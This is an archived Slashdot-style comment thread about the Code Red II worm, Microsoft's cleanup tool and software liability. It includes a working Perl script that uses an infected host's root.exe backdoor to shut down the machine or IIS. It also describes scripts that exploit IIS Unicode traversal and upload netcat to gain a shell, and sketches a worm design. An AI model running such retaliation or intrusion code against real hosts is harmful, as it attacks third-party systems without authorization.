Microsoft's IIS is a very featureful suite of utilities that includes much more than a web server. It's not surprising at all that it has more bugs than the spartan Apache.

Re:Start blaming Microsoft again

Duh, this worm affects everyone on the internet. That's why we blame Microsoft. If it didn't affect us we wouldn't care much.

Re:The $64K question: Does it actually work?

[psychalgia]

the patch worked, it cleared my server of any problems, but it did report if failing to complete. Either way I can no longer "get root" via a webserver, and www.securityspace.com reports im clean. Now I just sit and wait for the next one! (Actually, compound this with the fact that my entire company depends on RHYTHMS, it has been an EXCITING week)

Re:CI Host sucks rocks

[alexburke]

Email me. I might have a solution for you.

Re:Warhol Worm proposed: 15 minutes to total infec

[Rubik+Penguin]

This is spot on. Changeover to IPv6 (with its larger address space) would have stopped Code Red before it even started. A worm would take years on IPv6 to find another host to infect. IPv6 would put an end to random port scanning too.

Re:FUD ALERT

[Patrick+McRotch]

Funny, I've never been paranoid about installing/patching anything, regardless of the operating system. It seems to me that a GOOD ADMIN would have any important data backed up prior to installing/upgrading any mission critical servers. Just because you're a negligent moron doesn't mean that Windows sucks.

Slowlaris? Wooden door with rotten hinges?

Slowlaris is the least secure UNIX I've ever met. Starting from a default installation you have to install a 20 meg patch bundle before you can even start thinking about hardening the system.

Re:Not the mess they made...

[mpe]

A computer is a tool. You have to learn how to use it properly. Do you go around demanding that 747's be made so easy to fly that every office worker could do it ?

Also a pilot isn't going to be maintaining the aircraft. Certainly they can't use the controls in the cockpit to change the engines or such like...

Re:What if

I would blame Red Hat for making an insecure product.

In today's environment, *any* server should install with NO services running, say so, and have a straightforward procedure for enabling the ones desired by the admin/owner. To do otherwise is to encourage insecure servers.

Re:Next step: automate it!

[serial+frame]

Okay, fine, it's not in perl (bash, actually), but I wrote a slew of scripts for firing at people that appear in my logs (of course, nothing was really done other than enjoying seeing their cmd.exe).

hackiis (gain a shell, w00t!)

execmd (Run a command)

my default.ida (give the NT/2k slackers a good show)

Not much explanation is needed for hackiis, other than the fact that it probes a given host for the Unicode directory traversal weakness, checks for root.exe, checks for nc.exe, uploads it from a given FTP server, and gains a shell. (please edit hackiis). My default.ida will attempt to point whomever views it to goatse.cx (Change it if ya want, I couldn't think of anything else, hehe). Also change the $log variable to match your setup.

For some, it has a high lameness factor, but after several days of seeing my logs grow past the 1MB mark, I felt like taking advantage of it. Malicious? Not in my book. But highly entertaining in a sick, twisted way.

I don't think this is funny...

[drnomad]

I clicked on that "link" and it seems that it tries to shutdown your PC.

Fortunately, I'm using Linux, but what if I was a Win user, having some files opened? Clicking that link (I'm only asking for a warning please) would make me loose some precious work.

Micheal, please add a warning about what that link actually does, now my machine was tested while I didn't even know upfront what was going to happen. Yes, I know, if I were infected, I'd be unhappy too, but please show some understanding.

Re:Liability for software defects

[ZxCv]

I highly doubt software makers will ever be held liable...

Particularly in the x86 market, there is such an abundance of 3rd party hardware that goes into most systems. This usually means 3rd party drivers. And because these all have to work together, who's to say that it wasn't a bug in Windows that caused that video driver to fail? Or was it a bug in the driver itself? Who is to be held liable here?

I don't think it is such a stretch to say that some software makers could (and maybe should) be held liable for their software. Such as in the case of the over-radiation that caused deaths. Last I checked, I didn't see the IIS bug causing anyone to croak and that last BSOD didn't give me any serious medical problems either. If traditional PC software makers were held liable for their software, the PC software market would simply collapse. And beyond that, the few companies left that could afford the added costs of this liability would be left to charge outrageously high prices for the software that they were able to sell.

So, at first, this maybe sounds like not such a bad idea. But after thinking about it, I'd definitely be against it (for the most part).

Re:Script doesn't work anyways

[nick-less]

Works in what way? If you mean it sends the HTTP request, then yeah, that probably does work. But it's not gonna shut down IIS.

It's like GC said in another thread here: It depends on the specific setup of the infected machine. There is no common way to shutdown it. Bothering the admin with mails seems to be the only way. But those forgotten machines burried behined walls will annoy us forever..

Re:Not the mess they made...

[malfunct]

His point is that the patch was avaialble and public BEFORE code red. Meaning that MS found the vunerability and issued a fix to it and noone used it. That happens no matter what OS you run, if you don't keep it up to date you get hosed by bugs. In this case MS did as well as anyone could to fix the problem.

You people want to ask for all software to be perfect before released but you know what that doesn't happen. In the OOS world you can just keep the software in forever beta but in the commercial world you have to eventually go "I hafta ship this its really pretty good" or you go broke. Linux has security holes, they send out patches all the freaking time, if you don't install the patch is that the linux communities fault?

On a similar not the only reason I think that worms like this are written for windows more often than unix (because I am CERTAIN that you could set up a worm to exploit apache/unix if you set your mind to it) is that there are just more windows users to exploit so it spreads faster and makes bigger news, and anyways the people that write these viruses buy into the popular hacker hype that windows sucks.

Re:Not the mess they made...

[ZxCv]

IIS is not installed by default on W2K Pro. Therefore, whoever was responsible for installing your workstations is responsible for the fact that they are running IIS when they should not be. Granted, it is not the users' faults but it is no more MS's fault because it was happening on workstations that it shouldnt have been.

Re:Next step: automate it!

Code Red Vigilante does this. Check out http://www.dynwebdev.com/codered/.

Re:I would like to have sex with a teenage girl.

Me too....18 will work just fine...moron

Re:If you've had a corporate hit on your network..

[GC]

Yes,

Those machines have probably been patched since infection, but have not been cleaned. The patch does not dis-infect Code Red from the machine, a lot of web admins don't realise this.

I have found Vulnerable machines with this tool. I'm also wondering if unpatched infected machines show up with it - as Code Red prevents re-infections by it's own code.

Re:Not the mess they made...

[Fishstick]

You are quite right, and I didn't mean to imply otherwise. This is in fact a problem with the group that supplies the PCs to the various departments. They have a process where they "ghost" pre-configured drive images. For some reason, they use a standard development image, which includes a running IIS5 config, on _all_ machines, even those used by the secretarial staff. Go figure.

But you are right, this isn't as much MS's fault as the bonehead admin that set up the default machine configs.

Good alternative script

[Anthony+Kilna]

#!/usr/bin/perl -w

# Authored by Anthony Kilna (anthony@kilna.com) Licensed under GPL

# Change these variables to taste...

# 1 or 0 depending on whether you'd like to shut down NT entirely or just IIS
$full_shutdown = 1;

# 1 or 0 depending on whether you want to spoof a http 404 status code
$spoof_404 = 1;

# The location of a file that will be served up (if you're 404-ing this should
# look like a typical 404 message from your server for the file /default.ida)
$file = '/www/404.html';

use LWP::UserAgent;
use HTTP::Request;

# Make the HTTP header
if ($spoof_404) {
print "Status: 404 Not Found\n";
}
print "Content-type: text/html\n\n";

# Output the file to the browser
if (open FILE, $file) {
while (<FILE>) { print $_; }
close FILE;
}

# Makes it so the browser/virus isn't waiting for the outgoing request below
close STDOUT;

$server = $ENV{'REMOTE_ADDR'};
$rooturl = "http://$server/scripts/root.exe";
$connection = new LWP::UserAgent;
# Look like we're a real browser (ha!)
$connection->agent("Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)");

if ($full_shutdown) {
# Attempt to shut down NT
$command = '/c+rundll32.exe+shell32.dll,SHExitWindowsEx+5';
}
else {
# Attempt to shut down IIS
$command = '/c+iisreset+/stop';
}

# Make the request
$response = $connection->request(new HTTP::Request GET=>"$rooturl?$command");

# See if it worked, if so report to the web server's log file
if ($response->is_success) {
if ($full_shutdown) {
print STDERR "Code red NT shutdown on $server\n";
}
else {
print STDERR "Code red IIS shutdown on $server\n";
}
}

Shuts down only DANGEROUS machines

[leonbrooks]

This is like selling a shotgun that only fires when pointed at another weapon that is pointed at it, and cannot be modified to do anything else.

However, many people will (as you have done) only see that ``it is a shotgun'' (and panic), not that it is totally harmelss except as used against armed attackers! This is important because some drooling idiots will now conclude, ``it's OK to sell shotguns because SlashDot has done it already''.

Re:Script Error

Call me naive, but isn't it also a problem that the script wants to shut down IIS and THEN issue a command through the infected IIS to shutdown the computer??

Blame Canada!

[rasjani]

Im coordinating Programmers Against Canada. Anyone want to join ? Everyone who joins gets official P.A.C-MAN membership card =))

So I get to sue Linux?

[sheldon]

Now that's an interesting quandry. LLC's were setup to protect shareholders from liability claims against the company. So I as a developer for software at Acme Corp cannot be legally held liable, myself, for the software I created while working for the company.

But Acme Corp can. Hell if it's bad enough, they'll get sued to high heaven and go bankrupt. Then I can just go find another job.

But what corporation protects Linux? If there's a fault in the Linux kernel which causes something bad to happen... Who do I sue?

Are Linus Torvalds and Alan Cox protected by a LLC? Or do I just sue them personally?

Now you enter into the world of politics. How do you write a law which damages your adversaries, while protecting your friends?

Then the question comes in. What exact purpose does this serve to our society? Will software get better, or will there just be less of it? Especially in light of the fact that you mentioned indirect uses of software, such as AT&T.

It's very easy for people like Bruce Schneier to talk about this because they don't actually write and sell software.

I'll be impressed when you get Larry Ellison or Scott McNealy up there saying it's a good idea. I'll be really impressed when you get Bill Gates.

Re:Not the mess they made...

[Nater]

Microsoft fixed the problem before there was a problem.

I disagree. Code Red is not the problem, it is the symptom. If Microsoft had fixed the problem before there was a problem, then the buggy version of IIS never would have shipped.

CI Host sucks rocks

[The+Big+Bopper]

My domain is on a shared Linux host at CI Host. For over one week now, starting August 2, my domain has been totally useless to me. I couldn't log in to update my content. I couldn't recieve email on the domain POP3 box. I couldn't log in with a POP3 client to download any mail that did sneak through. All this went on for over a week. I would call up on the phone and stay on hold forever... a couple of times I would get clueless technicians that would just say "It's the Code Red virus... our administrators are aware of the problem and will have it fixed as soon as possible". OK I gave them some time to get it fixed because half the internet was having problems with this. But then I noticed everyone else was getting better, and CI Host was still down (except their own www.cihost.com site, which was still aggressively selling service to new customers). I would open up online trouble tickets with them, only to have them get closed without resolution. I re-opened and escalated a couple of times and finally early this morning they took my server down to perform some kind of unknown maintenance and when it came back up it was running better than it EVER had before in the 2+ years I've been with them.

If anyone is thinking of using CI Host, let me tell you THEY SUCK. About twice a year something major like this happens where I'm down for a week or more. In December of 1999 I went down for almost a whole month (their press releases will tell you it was a much shorter time than this but that is BULLSHIT).

I'm looking at maybe switching to PrimeMaster Online (http://www.primemaster.com). Anyone here have experience with them?

Re:CI Host sucks rocks

[Micah]

Yikes, I just about used those guys. Then I found www.bchosting.com and have been fairly happy with them so far....

Re:CI Host sucks rocks

[robogun]

I have been using host4me linux box for two years. Virtual acct with 450mb. Uptime 98% (but they ACTUALLY backup) and real customer service. Check out server4me if you want a colo BSD box at $99/mo. You have to admin the box yourself, tho. One IP, 8 gig disk. Mine has been up since September w/ no interruptions.

Re:CI Host sucks rocks

[sheeler]

I use FutureQuest as a web host, and have been with them for over two years. Their service is extremely responsive, and their uptime is incredible. I recommend that you check out their Support/Discussion forums so that you can see for yourself. You will be amazed.

Re:CI Host sucks rocks

[cliffjumper222]

I use CIHost because they're dirt cheap. I didn't like it when they took away lynx ("due to the load it places on the system") but they're just a temporary service for me until I scrape together the real pennies. Apparently they were blocking IP address spaces on their routers. I couldn't get in from home but work was fine. I fully expect them to complain when my web site starts really getting hit even though they supposedly offer unlimited bandwidth... yeah right!

Re:Not the mess they made...

[pa-guy]

I know that this has been said before, but when I see this kind of crap I have to respond. Most of the infected boxen are not run by companies etc. My logs show mostly home users who probably don't even know that they are running IIS.

I'm not an MCSE, and I don't use the M$ products, but I'm willing to bet that most NT/2000 admins have patched already. I'm sure this will get modded down, because some crack-smoking moderator has already modded the parent up.

Re:Not the mess they made...

[psychalgia]

except for when we applied sp2 to win2k professional and it corrupted the whole flipping drive. Am I suppose to do this to my webservers w/out taking some time and reviewing the cause?

either way, we're migrating to LinUx, hopefully before the next breach

as much talk as i hear though, this could have just as easily been LinUx that got backdoored and if it was, it probably would have gotten a LOT more attention, even threatened the existence of the OS itself, so CHILL OUT.

FOR AN A+...

...don't cut your hair or shave for a year, drink ten cans of Mountain Dew every day and eat only Big Macs, become a homosexual, and move to Cuba. Then you'd be the ULTIMATE open source dood.

You're a bl**dy spoilsport!

[leonbrooks]

Which system did Ramen infect?

How come despite there being (at the time) three times as many Apache servers up as IIS, there wasn't a shadow of the traffic that CodeRed caused?

Software has bugs. They get found, they get fixed, move on.

Don't tell only half a story, and leave out the exciting bits that make it all flow. ``They get found'' seems to have take, oh... six years, is it now? Why? (1)

Not only that, breaking Apache (to pick a common example) doesn't automagically get you superuser capabilities. Why not? (2)

It's been four years now since Apache had a hole this bad, but IIS had them somewhere between monthly and quarterly. Why? (3)

<upside-down><font size="1">1. Only Microsoft can see the source, and their programmers generally don't understand security. 2. IIS is design-insecure partly because takes as many shortcuts as it can to avoid being molasses-slow. Did you know that the Mindcraft benchmarks used FAT instead of NTFS for the same reason? 3. Performance and user friendlyness and saleable features are all more important to Microsoft than security or stability.</font&gt</upside-down>

They didn't worry about the lawyers this time...

[ZxCv]

Microsoft admitted 3 months ago that they had a bug and promptly released a patch-- at least a month before Code Red ever surfaced. I highly doubt that they had much problem getting this past their lawyers since the original patch would have already been enough to admit the problem existed. I'm sure this was 100% the result of a PR directive.

Re:Unforgivable!

[Tony-A]

If I was running a browser on an IIS machine that that script would shut down, then yes, I would want it to shut my machine down. Probably safer than whatever Microsoft is putting out.

You got it wrong. MCSE's are trained to...

[Robber+Baron]

...solve everything by Reboot, Re-install, Add RAM!

Re:Not the mess they made...

[easter1916]

Yes, I do. The rain IS making me wet.

But this is great for big networks

[ZxCv]

Think of the admin that has to test and de-worm a couple hundred or more machines. Then this tool becomes real nice.

It also removes some server mappings (which I believe are just registry entries), so while still nothing super difficult, it means everything is much faster than by hand and that the admin didn't have to spend time writing an app that could do all this himself.

Re:But this is great for big networks

[Lennie]

Only reason they wrote this, is because m$ internal network was infected and it turned out... it's a _lot_ of work getting all those machines patched... we have this now... we might as well trow it into the world.

Why no lawsuits?

[-tji]

It seems there are a lot of companies effected by each of Microsoft's gaping holes. The lose data or experience break-ins, but Microsoft keeps humming merrily along producing bad code.

If this happened to your new car, television, blender, etc. you would demand a refund. If it happened to everyone's new car, there would be a class action lawsuit.

While I'm no fan of this over litigious atmosphere in the U.S. At least it does cause corporations to behave with more concern about the quality/safety of their products. Microsoft could use a LARGE DOSE of this. Creating products that NEED an upgrade is part of their business plan, and a disservice to their customers.

Wow

[indecision]

I just grepped my lab's httpd logs for codered attempts, and I came up with an amazon.com.br server, and a bank!

This is scary. Really scary.

--indecision

PS Anyone want some books? And do any of you know where I can buy a small caribbean island by banker's draft?

But how many know that?

[wirefarm]

You and I know that you don't need your proof of purchase, but is it inconcievable that the bulk of people using a bootleg copy would feel uncomfortable going to Microsoft.com - Thinking that MS will somehow *know* and track them down?

Re:But how many know that?

[Phroggy]

You and I know that you don't need your proof of purchase, but is it inconcievable that the bulk of people using a bootleg copy would feel uncomfortable going to Microsoft.com - Thinking that MS will somehow *know* and track them down?

Sometimes I fear that after visiting their Web site, Microsoft will track me down even if I'm not pirating their software.

Script Error

[UVABlows]

The author intended for it to shutdown iis first, then the remote machine, but he is actually issuing the iis shutdown command twice. Examine: my $resp = $ua->request ($iis_stop_req); if ($resp->is_success) { my $server_stop_req = [...] $resp = $ua->request ($iis_stop_req); That second request should be $server_stop_req instead of $iis_stop_req Now to fiddle with httpd.conf..... WOW SLASHCODE SUCKS, I couldn't submit this at first because it was considered a junk character post. That filter really sucks, I've triggered that so many times trying to do an actual post.

Re:Script Error

[B-o-K]

What about this Apache-errors:

Name "main::server_stop_req" used only once: possible typo at /usr/local/www/htdocs/default.ida line 46.
Can't call method "method" on an undefined value at /usr/local/lib/perl5/site_perl/5.005/LWP/UserAgent .pm line 163.

?!

I've changed
my $resp = $ua->request ($server_stop_req);
into

my $resp = $ua->request ($iis_stop_req);
Maybe it works now... can't seem to shutdown a host right now.

Re:Next step: automate it!

[Mike+Hicks]

C:\>ftp -h
[snip]
-s:filename Specifies a text file containing FTP commands

Looks like you just have to find an FTP server that has the program.

Re:Not the mess they made...

[ZxCv]

I think more of the point is to keep these wonderful Slashdot editors in check... I can't remember ever seeing a story regarding Microsoft that put them in anything but a negative light-- even if it wasn't completely justified, as in this case.

The editors/story posters/whatever are always going to have the ability to put a little hint of MS bashing right there at the top of the page, so there has to be at least one person willing to try and set things straight...

Re:Blame people that ENCOURAGE this...

[tcc]

Microsoft encourages the thinking and then people just do it because "Microsoft says it's secure" or "Microsoft says it's stable" and so forth.

And I guess that Linux is better in that perspective? How many times you see linux people doing the EXACT SAME THING by saying it's more secure and stable than Windows? Wouldn't that bring the exact same reaction? "I'll install a linux/apache server because it's more secure" but what if that person has the 0-patching thing in mind already? It's not FORGED by microsoft alone, that's my point... both platforms do the exact same thing on that issue.

I don't want to start a Linux Vs Windows war because it's totally useless, and I surely don't want to be seen on the M$ side :), but my point is still valid, and the one who modered that as a troll is probably another zealot who can't understand and saw his beloved platform scratched by my comments.

In the end, any OS needs patching, and people needs to be educated about it. Linux or WIndows or MAC I don't care, seeing my RD light on my modem still flashing like hell after that much time after that virus (and titles like aftermath) got announced, THAT worries me a lot.

Spot the flaw in the logic

[Rubik+Penguin]

For many IIS web server admins; reformatting the hard disc wont work. Why? ....

Because all the pages of their website are in C:\InetPub, so they will back that up first and restore it after the re-install.

Now where was that root.exe file? ....

Re:Warhol Worm proposed: 15 minutes to total infec

[SuiteSisterMary]

And at that point, you program the worm to be self modifying. Target some 'known' servers. Infect them with targeted worms. On some condition (probably date) each worm (lets say N is the total number of preinfected systems) will start scanning a group of addresses. If V represents the total number of IPV6 addresses. Each host will have a group of exclusive addresses, E, E being V/N number of addresses. Whenever a host finds a new victim, it will give that victim a range of addresses in E to go through, after which the 'subhosts' will attack random. The host will then start scanning the next address past the block it just doled out.

Re:Who to blame: MS or Admins?

[Capt.+Beyond]

You're wrong. Its the virus writers fault.

Micro$oft is so goddam disingenuous...

[talks_to_birds]

[disingenuous: (adj.) not straightforward; crafty.]

...that I just about want to puke.

• "Tool to eliminate the obvious effects of the Code Red II worm"

  "* THE TOOL ONLY ELIMINATES THE EFFECTS OF THE CODE RED II WORM. IT DOES NOT ELIMINATE THE EFFECT OF OTHER VARIANTS OF THE WORM."

  "* IF THE WORM HAS INFECTED YOUR SYSTEM, YOUR SYSTEM HAS BEEN OPENED TO ADDITIONAL FORMS OF ATTACK. THIS TOOL ONLY ELIMINATES THE DIRECT EFFECTS OF THE WORM. IT DOES NOT ELIMINATE ANY ADDITIONAL DAMAGE THAT OTHER ATTACKS MAY HAVE CAUSED WHILE YOUR SERVER WAS INFECTED."

Obvious effects..? Other variants..? If (for crissakes, IF?) the worm has infected..?

Those are just minor issues, and certainly not Micro$oft's problem, let alone Micro$oft's fault.

Remember, Micro$oft's EULA makes them absolutely not responsible for anything.

If Micro$oft had *any* integrity, it's core message would be: "You're totally screwed through our misfeasance."

Instead, it's "You're totally screwed, and we're off the hook entirely."

Remember: "We're Micro$oft, we're as big as they get, and we don't care because we don't have to!"

t_t_b

Re:Microsoft made this mess? Huh?

[david.johns]

Just to point out something others have pointed out before:

AFAIK, the patch doesn't work under certain conditions. (URL redirection.)

With that in mind, there is still a problem - the patch itself is inherently not 100% effective. We are not trying, in general, to limit the worm - we are trying to eliminate it. I'm sure there are some people for whom the URL redirection is critical, and, therefore, the worm is simply an annoyance.

Just my usd .02. ;)

Re:Next step: automate it!

[nebby]

http://slashdot.org/comments.pl?sid=01/08/05/16202 20&cid=65

Re:Not the mess they made...

[ColdGrits]

You mean like Microsoft itself (infected at hotmail and at Redmond) ? :-)

Aftermath?

[dsfox]

Is code red over? I'm still seeing as many hits
as I ever did...

Well that's not very nice...

[glenebob]

of you Michael, to post a link to this page. You ought to be ashamed of yourself. Now if only you'd linked to it correctly, maybe it would have worked. Like this mwahahaha...

Gee, Apache doesn't seem effected by it...

Re:Not the mess they made...

If there's a hole in your roof, do you blame the rain when you get wet?

Liability for software defects

[jeffy124]

There's been talk on places like CNN and CNet about software makers being held liable for serious defects in much the same way Ford and Firestone are for their recent tire troubles. Some good examples where this would apply include some major items in software bugs history: the AT&T 800 service outage, the hospital radiation treatment software controllers that killed people from overexposing them to radiation, and of course Code Red. CNN interviewed Bruce Scheneir (sp?) about this isue and he is all for holding software makers liable. Last week I tried submitting those stories to slashdot, yet the editors dont think it's an issue and won't post it, despite the fact that if liability someday hits the software market, it hits OSS people too.

Re:Liability for software defects

[Rubik+Penguin]

Not sure if anyone really has a case against Microsoft itself. They did release a patch and advise not installing IIS unless you want to run a webserver, and disable the index server unless you need it.

Maybe all the home users who bought a "Personal" computer with IIS preinstalled and enabled by the supplier have a case against their supplier. Is it reasonable to describe a computer running IIS as "Personal"?

Re:Liability for software defects

[kalamazoo904]

Amen, brother. I submitted that story too, and got rejected too.

Re:Liability for software defects

In 5 years that could become a SERIOUS economic issue for the US, maybe german software will become the avant guard (like german engineering is thought of now), or japanese software will be the highest quality (like japanese steel is now). And suddenly we'll find outselves out of the software market like were out of the car market and out of the electronics market

See... kind of like natural selection! We will then sort it out. But getting everyone to change when we are making millions will be hard! A law will just make people try to route around the law.

Re:Liability for software defects

[peccary]

If you want to avoid liability, you can always publish anonymously.
Under traditional law (pre-EULA BS) products are sold have an implicit warranty of fitness. Gifts and "found objects" do not necessarily.
I've been programming for a couple of decades know, and this has been an issue for the entire time. But on balance, I think it would be a good thing.

Re:Liability for software defects

[Ratbert42]

I think it would be hard to find Microsoft liable in court. They did the closest thing to issuing a recall (a patch) that they were capable of.

What could they have done better? E-mail every registered NT/2000 user to warn them? Have IIS automatically check for updates? Force users to install the critical update service? I'd be comfortable with all of those.

Re:Liability for software defects

[tswinzig]

There's been talk on places like CNN and CNet about software makers being held liable for serious defects in much the same way Ford and Firestone are for their recent tire troubles.

The major difference in this case, and the reason that any case against Microsoft would ultimately lose (at least for the Code Red attack), is that Microsoft released a patch well before Code Red came out.

Ford and Firestone, on the other hand, tried to cover it up for as long as possible.

Re:Liability for software defects

[Phroggy]

The GPL doesn't restrict what you can do with software the way other EULAs do. The software is copyrighted, and you can do what you'd like with it while still adhering to copyright law (fair use, don't distribute copies or derivatives) regardless of the GPL. The GPL grants you certain additional rights, such as the right to distribute derivative works, under the condition that all derivative works be licensed under the GPL, and that the source code be made available to anyone who has received a binary. If the GPL were declared null and void, you'd still be restricted by copyright - and tell me, do you really think software copyrights will ever be done away with? After all, isn't Office XP copyrighted?

Re:Liability for software defects

[fava]

Unfortunately when you buy software you are not actually buying the software, you are only buying a license to use the software.

If you were buying the software then various consumer protection laws come into effect. If you are licensing the software then the license can set it's create its own terms. Of course the software makers have put very favorable terms into the license.

If the courts were to decide that the licenses are a legal fiction and what really has taken place was a sale then we will see some action in in the form of lawsuits and as an improvement in software quality.

If the courts were to decide that these licenses were invalid, how would that effect the GPL? It's not a sale since no money changed hands, but if licenses are invalid the viral aspects of the license would be invalid. In essence you have taken the GPL and turned it into the BSD license. I don't know if i like that.

Microsoft made this mess? Huh?

[tswinzig]

Michael writes, So, Microsoft has given you a mop to clean up the mess they made.

No, Microsoft gave us a mop to clean up after the mess the Code Red author(s) made.

You see, more than a month before Code Red came out, Microsoft gave us the patch for the security breach that allowed Code Red to take place.

Re:Microsoft made this mess? Huh?

[JoeBuck]

Microsoft did not make the mess by just having a security hole. Security holes happen. The reason Code Red exploded, and the reason it's taken so long for everyone to patch their systems, is because the lion's share of infections are to systems where the owner didn't even know that he or she is running IIS.

Now, even this kind of mistake happens and is made by others, which is why an unpatched Red Hat 6.2 box will survive on the open Internet for less than 15 minutes before being rooted. But Microsoft made a critical error a month ago, when Code Red I broke, by not urging all users to check whether they intend to run IIS or not, and if not, to turn it off.

Finally, Microsoft is to blame for releasing a security tool at this late stage that will not do the job. By now, the bad guys have used their lists of IP addresses of infected systems to install back doors on tens of thousands of systems. These back doors will survive Microsoft's mop. But telling the truth -- that the only safe thing is to reformat the system and start all over again -- will look really bad and cost the users a lot of time and money. So they mumble something about checking the CERT advisory to cover their asses legally, and then the do this irresponsible thing.

How to use Perl and Lotus Domino Server

[scotpurl]

Lotus Domino can use Perl. Off-topic, I know, but this is to help out folks.

1. Make sure your server is not using IIS (since life is easier that way.
2. Install Perl from perl.com. You don't need the ISAPI stuff. Make sure perl is in the path.
3. add a file association on the OS level for .ida files pointing to the perl interpreter. (copy what you see for .pl files)
4. create a URL -> URL mapping of /default.ida to /cgi-bin/default.ida
5. place the default.ida script in your Lotus\Domino\Data\domino\cgi-bin directory.
6. restart the domino server.
7. Test it with http://myserver/default.ida?one_arg

Not all of us use Apapche, so save the flames. Some of us have to stick with what the company we work for requires us to use.

Unforgivable!

[Remote]

Way to go, michael!!! Putting a link on /. frontpage to a script that shuts down machines.

You guys have crossed a dangerous threshold here (Im assuming this is the first time). My guess is that it will take people quite a while to forget this.

And, no, my machine was not shut down.

Re:Not the mess they made...

[ZxCv]

This deserves a -1,Retard.

I've been using different variants of UNIX for about 10 years and Windows for about 8. And as a competent professional, I know how completely absurd it is to assume that because someone is using Windows, they have no computer savvy.

Think a little bit before you post next time...

Start blaming Microsoft again

[leonbrooks]

As has been so often pointed out, many of Microsoft's fixes also often break things, and they have a nasty habit of occasionally including "improvements" that eventually dead-end you and don't become obvious for some time - like well after it's too late to back out the patch. These features combine to make many admins that I know highly reluctant to install Microsoft's fixes.

Apache is more of a monoculture (about twice as much) than IIS, yet Apache worms this bad generally don't happen because:

* Apache is not design-insecure, as is practically every Microsoft product - for example, Exchange's security goolies are still flapping in the breeze (have to be due to fundamental design) and I expect to see another CodeRed appear targeted for it Real Soon Now;

* If you want active facilities, you have to install them - or at least switch them on - because they either don't come with the base server (e.g. PHP) or aren't available in default pages to exploit (e.g. XSSI);

* The active facilities can only touch as much as the webserver can touch. Users named ``apache'' or ``nobody'' generally don't have write access to a great deal of the file system;

* Even though Apache as such is a monoculture, there is great variety between Apaches. They run on a wide variety of CPUs and OSes. Your binaries might be in /usr/bin, /usr/local/apache/bin, /opt/apache/bin or any one of a number of places; your web pages might be in /home/httpd/html, /var/www/html, /usr/local/apache/html or anywhere the admin chose to put them. It might be running chrooted, it might or might not have zero or more of a great number of modules enabled, and so on;

* Apache adheres to standards; a lot of IIS holes have been in Microsoft special features;

* Apache's code (including most common add-ons) has been examined by a wide variety of eyes using a wide variety of techniques.

Using Microsoft software costs you all of these advantages and more.

Who to blame: MS or Admins?

[slasho81]

People here suggest that admins are to blame of the Code Red ongoing catastrophe because they took the responsibility to maintain a server.

Some posts accuse of letting MCSE handle servers, which only mighty hackers with years of experience should touch.

I think it's stupid. there aren't enough admins that fit to the definition of experienced hackers. that's why organizations buy server software to handle 'serving'. they hire admins to operate the server not to code-and-compile or patch every morning. It's true that admins are the ones responsible to patch software, but you can't expect all servers to be patched the moment a patch is released, hell, MS servers failed to patch on time.

The software is not secured. whose negligence is it?

Re:Actually: authors of strncat() MAN PAGE and get

[csbruce]

Make your own functions. I use:

void StrCpy( char *dest, const char *source, long destSize );

void StrCat( char *dest, const char *source, long destSize );

etc. E.g.:

char str[STD_LINE_SIZE];
StrCpy( str, blah, STD_LINE_SIZE );

M$ din't do crapola. They made it.

[TrollMaster5000]

Blame M$ for making a shitty system that ALLOWS, Yes M$ LUSERS, ALLOWS the worm to execute itself over & over. The OS simply executes the programs itself. This causes virii, worms, and other goodies to work/spread. So Yes. I blame M$. I blame them for making an OS that is virtualy worthless when it comes to security.

Someone needs to post that story!

[Controlio]

That was a good read. There is a lot of the assumptions that I'm skeptical about, and I would love to read the reaction of the more skeptical of the /. crowd to see how realistic the assumptions really are.

Not that I haven't submitted a good story or two in my day that has been denied... but this one really peaked my interest, especially given the recent outbreak of worms. Until someone gives the internet the pill I give my dog all the time, we need to start planning ahead before this type of thing really does cripple the internet.

Personally, I can imagine much worse attacks than the one listed in that article... all it would take is a good firmware flaw in a few key internet routers, and tahdah, the internet slinks along at the once familiar speed of 28.8kbps. Not that I'm a conspiracy theorist or anything. :)

Bad MS Downloads

The Red Worm fix does not require a reboot -- well, according to one admin. It turned out that the site with the Red Worm fix often quits downloading partway through the file -- and the resulting partial file does not always give any error windows when it is run, so people think they have patched their machines.

Re:FUD ALERT

[sqlrob]

Second, that FUD about service packs re-breaking the OS is just garbage. Please give me ONE example, JUST ONE, of a service pack opening up new holes for ANY WINDOWS OS, 3.1 and up. You can't because you are a paid basher talking out of your ass.

Ask and ye shall receive:

NT SP 5 or 6 (sorry don't remember which), broke the TCP/IP sequencing algorithm, making vulnerable to spoofing.

The fix for security holes in Exchange Web broke the server (twice - took 'em till the third try)

My job is programming Windows boxes, so no, I'm not a paid basher.

Remind me again...

[reemul]

Which system did Ramen infect? I'm pretty sure it wasn't a Microsoft platform.

Software has bugs. They get found, they get fixed, move on. The only reason MS exploits get more press and greater impact than Linux exploits is that MS is on more boxes. If, as you claim to desire, Linux takes off, the same people shrieking to the sky about what a crappy system MS has will be defending Linux and saying, hey, it happens. Stupid users who don't patch aren't Bill Gates' fault.

It's just the same crap from folks who attack NT as buggy and crashprone (which is almost always due to 3rd-party drivers) while extolling the stability of Linux, which they keep rebooting because they have wonky drivers. A ha! they say, I was using a beta driver, its to be expected. Well, that driver has been in beta for over a year, that's as good as it gets. Software has bugs, move on.

You want to ignore your own faults and start a religious war? I'm betting you can get some cheap flights to Tel Aviv right now. Knock yourself out.

-reemul
who wishes 2k wasn't so buggy, either, but doesn't want to hear the bitching from folks who need 2 hours and a phone call to a friend to get a soundcard working

Re:Remind me again...

You mean like these?

Why not simply uninstall IIS?

[Robber+Baron]

it also gives you an option to permanantly disable IIS.

Why not simply uninstall IIS? I'm running 2k at home and IIS is part of the default install config. It was also one of the first things to go.

Re:Why not simply uninstall IIS?

[hearingaid]

the permanent-disable function presumably would override future installs.

some M$ things install other M$ things automatically. I'm hoping that the permanent disable function would detect other programs trying to install IIS and stop them.

I'm probably too optimistic...

No Such Luck

[mstyne]

Been getting CR hits like wildfire, so I figured i'd give this a shot (until recently I had a default.ida file that refreshed to someone's page whom I don't care for very much -- I'm sure all the hits referenced from my machine confused him). However, after watching the logs for a little and ping'ing and lynx'ing the "offending" box, it would seem that the script doesn't do jack. Maybe it did at one point, but not anymore.

Re:Not the mess they made...

[subsolar2]

Hmmm, that's totally useless to me ... since I don't run windows and so can't run windows media to view it.

Anybody kind enough to provide a transcript for us looser linux users??

Re:Not the mess they made...

yep, same thing at my company. We are MS Solution provider / consulting firm. 40% of NT servers effected!!! LOL...

Next step: automate it!

[Quixote]

